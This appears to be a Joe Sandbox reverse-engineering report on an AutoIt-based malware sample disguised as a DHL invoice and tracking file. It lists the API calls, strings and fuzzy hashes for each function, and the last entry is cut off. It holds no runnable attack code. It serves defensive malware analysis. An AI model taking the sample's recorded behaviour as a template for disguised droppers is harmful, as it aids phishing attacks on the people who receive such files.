Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0ca071980401c956fe9e1f11ee714139a6b340bc230c81c4eb080120c9300c65
Instruction ID: a62f54a019d6ef07b7911bc3ed749e7952ae99f3b9b026ffca5ff80dc5033c63
Opcode Fuzzy Hash: 0ca071980401c956fe9e1f11ee714139a6b340bc230c81c4eb080120c9300c65
Instruction Fuzzy Hash:

Function 0124D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0124D807
timeGetTime.WINMM ref: 0124DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0124DB28
TranslateMessage.USER32(?), ref: 0124DB7B
DispatchMessageW.USER32(?), ref: 0124DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0124DB9F
Sleep.KERNEL32(0000000A), ref: 0124DBB1

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: d41e3d6240d3a71b79762243b44df8ae7886af8ea97d50463a6a1f1f9c995c71
Instruction ID: 2fa5dbc9c30d9ae86f5dab8fe839b4387ff8b3f98b7a6a46ec1fe943e04e15fe
Opcode Fuzzy Hash: d41e3d6240d3a71b79762243b44df8ae7886af8ea97d50463a6a1f1f9c995c71
Instruction Fuzzy Hash: F7420030624247EFEB39CF68C884BBABBE5BF65304F04451DE65687291D7B0E844CB92

Function 0128065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0128039A: CreateFileW.KERNELBASE(00000000,00000000,?,01280704,?,?,00000000), ref: 012803B7

GetLastError.KERNEL32 ref: 0128076F
__dosmaperr.LIBCMT ref: 01280776
GetFileType.KERNELBASE ref: 01280782
GetLastError.KERNEL32 ref: 0128078C
__dosmaperr.LIBCMT ref: 01280795
CloseHandle.KERNEL32(00000000), ref: 012807B5
CloseHandle.KERNEL32(?), ref: 012808FF
GetLastError.KERNEL32 ref: 01280931
__dosmaperr.LIBCMT ref: 01280938

Strings

H, xrefs: 012808BD

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: b5deb18b6038df50b82ad4df325f7c8eb2df9801c446c34bced6b3415813cc5c
Instruction ID: 8e47025b4744fd60e6ef47593cece310bc1d5ed259efb12ecc51b078f68b5041
Opcode Fuzzy Hash: b5deb18b6038df50b82ad4df325f7c8eb2df9801c446c34bced6b3415813cc5c
Instruction Fuzzy Hash: 75A13532A211068FDF29FF68D851BBE7BA4EB06320F14015DF8159F2D1CB31995ACB95

Function 0124344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01243A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01311418,?,01242E7F,?,?,?,00000000), ref: 01243A78

Part of subcall function 01243357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01243379

RegOpenKeyExW.KERNEL32 ref: 0124356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0128318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 012831CE
RegCloseKey.ADVAPI32(?), ref: 01283210
_wcslen.LIBCMT ref: 01283277
_wcslen.LIBCMT ref: 01283286

Strings

\, xrefs: 0128328C
Software\AutoIt v3\AutoIt, xrefs: 01243560
Include, xrefs: 01283184, 012831C5
\Include\, xrefs: 01243527

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: e2d11250805b4d31c7c225b154f636fccf02b1d9bff5781ee470572e937df1bf
Instruction ID: f919b1ecd0ebe7784855f89d5ea911658c69cccb2d8a7a34375e01e4845b01d7
Opcode Fuzzy Hash: e2d11250805b4d31c7c225b154f636fccf02b1d9bff5781ee470572e937df1bf
Instruction Fuzzy Hash: D6718E715253029FD728EF69E8809ABBBECFF99740F50082EF54583198EB309948CB51

Function 01242B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 01242B8E
LoadCursorW.USER32 ref: 01242B9D
LoadIconW.USER32 ref: 01242BB3
LoadIconW.USER32 ref: 01242BC5
LoadIconW.USER32 ref: 01242BD7
LoadImageW.USER32 ref: 01242BEF
RegisterClassExW.USER32(?), ref: 01242C40

Part of subcall function 01242CD4: GetSysColorBrush.USER32 ref: 01242D07
Part of subcall function 01242CD4: RegisterClassExW.USER32(00000030), ref: 01242D31
Part of subcall function 01242CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 01242D42
Part of subcall function 01242CD4: InitCommonControlsEx.COMCTL32(?), ref: 01242D5F
Part of subcall function 01242CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 01242D6F
Part of subcall function 01242CD4: LoadIconW.USER32 ref: 01242D85
Part of subcall function 01242CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 01242D94

Strings

AutoIt v3, xrefs: 01242C2F
0, xrefs: 01242C0F
#, xrefs: 01242C16

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: df1052ab79d8df038e9b1feddc91bedb507d523d754cc5614b0adb4b67f6bb82
Instruction ID: 44790d80d4d41459d4252f2f210011c60651105447f651cf5d6cf02848702ee9
Opcode Fuzzy Hash: df1052ab79d8df038e9b1feddc91bedb507d523d754cc5614b0adb4b67f6bb82
Instruction Fuzzy Hash: C9213E71E52314AFDB359FA5E859BE9BFB8FB48B50F00041AF600A668CD7B10560CF94

Function 01243170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0124316A,?,?), ref: 012431D8
KillTimer.USER32 ref: 01243204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 01243227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0124316A,?,?), ref: 01243232
CreatePopupMenu.USER32 ref: 01243246
PostQuitMessage.USER32 ref: 01243267

Strings

TaskbarCreated, xrefs: 0124322D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 7ace06ea105a5685e65a4e006b95023a1f246aba29d3568a9b9595edd9f42141
Instruction ID: d9fa437924ee86f6e82aa322d2f055f0e0fb89ba78fbd033991b26183e9646cb
Opcode Fuzzy Hash: 7ace06ea105a5685e65a4e006b95023a1f246aba29d3568a9b9595edd9f42141
Instruction Fuzzy Hash: 4441E635670226A7EF2DEB7CE84DBB93A6DF705344F040119FB16862CDDBA1A940C7A1

Function 01278D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238c5b2cd7b87e4e5b8174e32e738a8919dbf500467ae5eb165ea45e6ac4c114
Instruction ID: e0ea2d59d75fcf5cad46c7abca62300727e2a32d872b2388a498b3fc796eb5a2
Opcode Fuzzy Hash: 238c5b2cd7b87e4e5b8174e32e738a8919dbf500467ae5eb165ea45e6ac4c114
Instruction Fuzzy Hash: 03C1C175D2434AAFDF12DFACD845BBEBFB4AF1A324F044049E614A7292C7709981CB61

Function 001B25C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001B2691
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001B28B7

Memory Dump Source

Source File: 00000000.00000002.348694160.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: 4c0b56c57fe48a812484e0b558a5dcf2933be48302e98218aeecfb403e195fd5
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: 9DA12974E00208EBDB14CFA4C898BEEB7B5FF58304F208559E515BB280DB759A85CFA4

Function 01242C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 01242C91
CreateWindowExW.USER32 ref: 01242CB2
ShowWindow.USER32(00000000), ref: 01242CC6
ShowWindow.USER32(00000000), ref: 01242CCF

Strings

AutoIt v3, xrefs: 01242C89, 01242C8E, 01242C8F
edit, xrefs: 01242CAC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: e2230711af8c98f531f7390143971e7cc707e5dafe26a6eba499aefabd124d79
Instruction ID: 3ba426e59e7f08e5b08bf276e78baa6335ab8fba2f1a77b88f0047df5f340571
Opcode Fuzzy Hash: e2230711af8c98f531f7390143971e7cc707e5dafe26a6eba499aefabd124d79
Instruction Fuzzy Hash: 3DF0DA759402907AEB311727AC0CEF76EBDD7C6F50F01455EFA00A255CC6A11850DBB0

Function 012761FE Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,012682D9,012682D9,?,?,?,0127644F,00000001,00000001,8BE85006), ref: 01276258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0127644F,00000001,00000001,8BE85006,?,?,?), ref: 012762DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 012763D8
__freea.LIBCMT ref: 012763E5

Part of subcall function 01273820: RtlAllocateHeap.NTDLL(00000000,?,01311444,?,0125FDF5,?,?,0124A976,00000010,01311440,012413FC,?,012413C6,?,01241129), ref: 01273852

__freea.LIBCMT ref: 012763EE
__freea.LIBCMT ref: 01276413

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 0ff717245e077e5674ae8fafc49b19b5360276c2f1d440b91b6f52450b041a93
Instruction ID: 38cf7056ad6da4c7bf6972dfcc329c595d5cca5f1f249553bef4b2d67fc5dfd7
Opcode Fuzzy Hash: 0ff717245e077e5674ae8fafc49b19b5360276c2f1d440b91b6f52450b041a93
Instruction Fuzzy Hash: BC51E372A20617ABFB258FA8DC81EBF7BAAEF44A10F144629FE05D6140DB34DC40C760

Function 001B23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001B22A0: Sleep.KERNELBASE(000001F4), ref: 001B22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001B24B4

Strings

VXGJZEY92A87W8RV0LHE, xrefs: 001B2517, 001B251A

Memory Dump Source

Source File: 00000000.00000002.348694160.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFileSleep
String ID: VXGJZEY92A87W8RV0LHE
API String ID: 2694422964-2863275208
Opcode ID: 6728330b09f360387cd1d2da9dac85a8bcddb060148c1abe8dbe73afff1061c8
Instruction ID: 1fc37fea0e0355342fb6f6b0f8524062b0de03382645a22c6a760b94a4873f7c
Opcode Fuzzy Hash: 6728330b09f360387cd1d2da9dac85a8bcddb060148c1abe8dbe73afff1061c8
Instruction Fuzzy Hash: 81517131D14259EAEF11DBA4C818BEFBBB4AF19304F104199E6087B2C0D7791B49CB65

Function 012B2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 012B2C05
DeleteFileW.KERNEL32(?), ref: 012B2C87
CopyFileW.KERNEL32 ref: 012B2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 012B2CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 012B2CC0

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: e2119935f71818a1c2c158c97443c1010ae81171e57e407f176f212fc812c273
Instruction ID: 4e3cce3cb3bab44ed7f3120b3595466211b49e516877059cab0e7b08b9c4bcf2
Opcode Fuzzy Hash: e2119935f71818a1c2c158c97443c1010ae81171e57e407f176f212fc812c273
Instruction Fuzzy Hash: 85B15272D1021EABDF25DFA4CC84EEE777DEF58350F0040A6E609E6144EB70AA448F61

Function 01243B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 01243B40
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 01243B61
RegCloseKey.ADVAPI32(00000000), ref: 01243B83

Strings

Control Panel\Mouse, xrefs: 01243B3E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: f0b6d12f8a9284747fc1a41ad621cb2ba48aba74602566d10e56bc6243b12cce
Instruction ID: 803863ab309077731ffce2161c004e9dd18619c49633ef1d1b40462417964b59
Opcode Fuzzy Hash: f0b6d12f8a9284747fc1a41ad621cb2ba48aba74602566d10e56bc6243b12cce
Instruction Fuzzy Hash: CC115AB1521218FFDB25CFA8DC49AAEBBB8FF01740B008459A901D7210E2319A409760

Function 0124DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 012932B7

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 0c6c37ad8e9da1d75eccc85b8d759d70991cb11f97a5be2e71d12f770d9cc8c5
Instruction ID: 5eb6e0911958212a62308177b8cc86fde328886ffb19acbf2e2052043118bd63
Opcode Fuzzy Hash: 0c6c37ad8e9da1d75eccc85b8d759d70991cb11f97a5be2e71d12f770d9cc8c5
Instruction Fuzzy Hash: 76C2B075A20206CFEB28CF68C481ABDBBB1FF08310F158559EA55AB351D379ED41CB91

Function 01273073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,012413C6,00000000,00000000,?,0127301A,012413C6,00000000,00000000,00000000,?,0127328B,00000006,FlsSetValue), ref: 012730A5
GetLastError.KERNEL32(?,0127301A,012413C6,00000000,00000000,00000000,?,0127328B,00000006,FlsSetValue,012E2290,FlsSetValue,00000000,00000364,?,01272E46), ref: 012730B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0127301A,012413C6,00000000,00000000,00000000,?,0127328B,00000006,FlsSetValue,012E2290,FlsSetValue,00000000), ref: 012730BF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ad3da3a6f48c5a4f2db20f6fa50c09740101ecd5b1abaeba81400b8b691d5a29
Instruction ID: f8cf68da3d6a5b3c5b306a5975442571ab95ed7175b25d6b2390ddeacc381528
Opcode Fuzzy Hash: ad3da3a6f48c5a4f2db20f6fa50c09740101ecd5b1abaeba81400b8b691d5a29
Instruction Fuzzy Hash: C201D432772223ABDB328A7DEC499577B98BF45B61B100724FA05E7180DB31D415C7E0

Function 01243923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 012833A2

Part of subcall function 01246B57: _wcslen.LIBCMT ref: 01246B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 01243A04

Strings

Line: , xrefs: 012833EB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 0c3b84b2c9b3a7530fefb8ef13d09d3116d11bebb9113d73d033d8953d1720de
Instruction ID: 0c31fc93bc79570cf45d9c7d69d5ade24d6b4504479d8ee096762e5db3bfe442
Opcode Fuzzy Hash: 0c3b84b2c9b3a7530fefb8ef13d09d3116d11bebb9113d73d033d8953d1720de
Instruction Fuzzy Hash: 5331D071429312ABD729EB24D844BEBB7ECBF54714F00492EE699932C4EB709648C7C2

Function 0125FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 01260668

Part of subcall function 012632A4: RaiseException.KERNEL32(?,?,?,0126068A,?,01311444,?,?,?,?,?,?,0126068A,01241129,01308738,01241129), ref: 01263304

__CxxThrowException@8.LIBVCRUNTIME ref: 01260685

Strings

Unknown exception, xrefs: 01260692

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 0f7849a1402d7f93c48a60be3df483ae0e55b57c33490089b147c0903641694c
Instruction ID: 7d486aa849cdfaa45c106dd999fa40c7b1a9d8abeb78cc6e2602d0f14aba7106
